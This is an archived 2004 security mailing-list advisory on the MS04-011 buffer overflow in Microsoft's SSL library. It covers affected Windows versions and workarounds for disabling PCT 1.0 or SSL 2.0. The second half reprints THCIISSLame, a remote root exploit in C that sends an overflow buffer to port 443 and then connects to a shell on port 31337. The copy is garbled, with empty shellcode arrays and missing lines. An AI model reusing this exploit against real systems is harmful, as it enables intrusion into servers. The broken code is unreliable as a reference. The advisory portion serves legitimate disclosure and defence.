[NT] Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)

From: SecuriTeam (support_at_securiteam.com)
Date: 04/22/04

  • Next message: SecuriTeam: "[EXPL] Linux kernel 2.x setsockopt MCAST_MSFILTER Exploit"
    To: list@securiteam.com
    Date: 22 Apr 2004 12:44:31 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.

    - - - - - - - - -

      Microsoft SSL Library Remote Compromise Vulnerability (MS04-011, Exploit)


    ISS X-Force has discovered a remotely exploitable buffer overflow
    condition in the Microsoft Secure Sockets Layer (SSL) library. SSL is an
    encryption technology commonly used to secure Web and email
    communications. A buffer overflow condition occurs when processing PCT 1.0
    handshake packets that can lead to remote, privileged compromise of
    affected Windows installations.


    Affected Versions:
     * Microsoft Windows 2000 up to and including SP4
     * Microsoft Windows NT version 4 up to and including SP6a
     * Microsoft Windows XP up to SP1

    Note: The SSL library included in Windows Server 2003 contains the
    vulnerability. However, the PCT 1.0 protocol is disabled by default.

    If any SSL-enabled services are present, and both the PCT 1.0 and SSL 2.0
    protocols are enabled, remote attackers may exploit the buffer overflow
    condition to execute arbitrary code on vulnerable Windows server
    installations. This code would run with local system privileges. The
    protocols necessary for remote exploitation are enabled by default in
    Windows 2000 and Windows NT version 4.

    Common vectors for exploitation might include Internet Information Server
    (IIS), Exchange Server, Active Directory, and potentially any software
    making use of the Microsoft SSL library including unlisted third-party

    The severity of this vulnerability is compounded by the fact that SSL is
    most often used to secure communications involving confidential or
    valuable financial information, and that Firewalls and packet filtering
    alone will not be able to stop attacks. X-Force believes that hackers will
    aggressively target this vulnerability given the high-value nature of Web
    sites protected by SSL.

    The PCT 1.0 protocol is a legacy protocol that is not required for secure
    SSL communication. The PCT 1.0 protocol can be safely disabled as a
    workaround for the vulnerability described in this advisory. However,
    systems using Microsoft Message Queue or MSMQ cannot disable PCT 1.0
    without impacting MSMQ. In this circumstance, SSL 2.0 can be safely
    disabled to close the vulnerability. Successful exploitation of the
    vulnerability requires that both PCT 1.0 and SSL 2.0 are enabled. The
    vulnerability is removed if either PCT 1.0 or SSL 2.0 is disabled.

    Customers are encouraged to immediately evaluate the two scenarios
    described above and select a workaround that best applies to their

    Microsoft has published a Knowledge Base article (187498) that describes
    how to disable certain SSL protocols, including PCT 1.0, SSL 2.0 and SSL
    3.0. Microsoft Knowledge Base article 187498 is available at the following

    Additional Information:
    Microsoft Security Bulletin MS04-011:

    /* THCIISSLame 0.1 - IIS 5 SSL remote root exploit */
    /* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
    /* */
    /* Bug was found by Internet Security Systems */
    /* Reversing credits of the bug go to Halvar Flake */
    /* */
    /* compile with MS Visual C++ : cl THCIISSLame.c */
    /* */
    /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX,
    dvorak, */
    /* scut, stealth, FtR and Random */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <winsock2.h>

    #pragma comment(lib, "ws2_32.lib")

    #define jumper "\xeb\x0f"
    #define greetings_to_microsoft

    char sslshit[] =

    char shellcode[] =

    void usage();
    void shell(int sock);

    int main(int argc, char *argv[])
      unsigned int i,sock,sock2,addr,rc;
      unsigned char *badbuf,*p;
      unsigned long offset = 0x6741a1cd;
      unsigned long XOR = 0xffffffff;

      struct sockaddr_in mytcp;
      struct hostent * hp;
      WSADATA wsaData;

      printf("\nTHCIISSLame v0.1 - IIS 5.0 SSL remote root exploit\n");
      printf("tested on Windows 2000 Server german/english SP4\n");
      printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

      if(argc<2 || argc>2)

      badbuf = malloc(347);

      printf("\n[*] building buffer\n");

      p = badbuf;




      strncat(p,(unsigned char *)&offset,4);


      if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
       printf("WSAStartup failed !\n");
      hp = gethostbyname(argv[1]);

      if (!hp){
       addr = inet_addr(argv[1]);
      if ((!hp) && (addr == INADDR_NONE) )
       printf("Unable to resolve %s\n",argv[1]);

      if (!sock)
       printf("socket() error...\n");
      if (hp != NULL)
       mytcp.sin_addr.s_addr = addr;

      if (hp)
       mytcp.sin_family = hp->h_addrtype;
       mytcp.sin_family = AF_INET;


      printf("[*] connecting the target\n");

      rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct
          printf("[*] Exploit send successfully ! Sleeping a while ....\n");
       printf("\nCan't connect to ssl port 443!\n");
       printf("[*] Trying to get a shell\n\n");
       sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
       mytcp.sin_port = htons(31337);
       rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
         printf("can't connect to port 31337 ;( maybe firewalled ...\n");



    void usage()
     unsigned int a;
     printf("\nUsage: <Host>\n");
     printf("Sample: THCIISSLame\n\n");

    void shell(int sock)
     int l;
     char buf[1024];
     struct timeval time;
     unsigned long ul[2];

     time.tv_sec = 1;
     time.tv_usec = 0;

     while (1)
      ul[0] = 1;
      ul[1] = sock;

      l = select (0, (fd_set *)&ul, NULL, NULL, &time);
      if(l == 1)
       l = recv (sock, buf, sizeof (buf), 0);
       if (l <= 0)
        printf ("bye bye...\n");
      l = write (1, buf, l);
       if (l <= 0)
        printf ("bye bye...\n");
       l = read (0, buf, sizeof (buf));
       if (l <= 0)
        printf("bye bye...\n");
       l = send(sock, buf, l, 0);
       if (l <= 0)
        printf("bye bye...\n");


    The information has been provided by Mark Dowd and Neel Mehta of the ISS

    The exploit has been provided by: <mailto:johncybpk@gmx.net> johnny
    cyberpunk of THC


    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com


    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[EXPL] Linux kernel 2.x setsockopt MCAST_MSFILTER Exploit"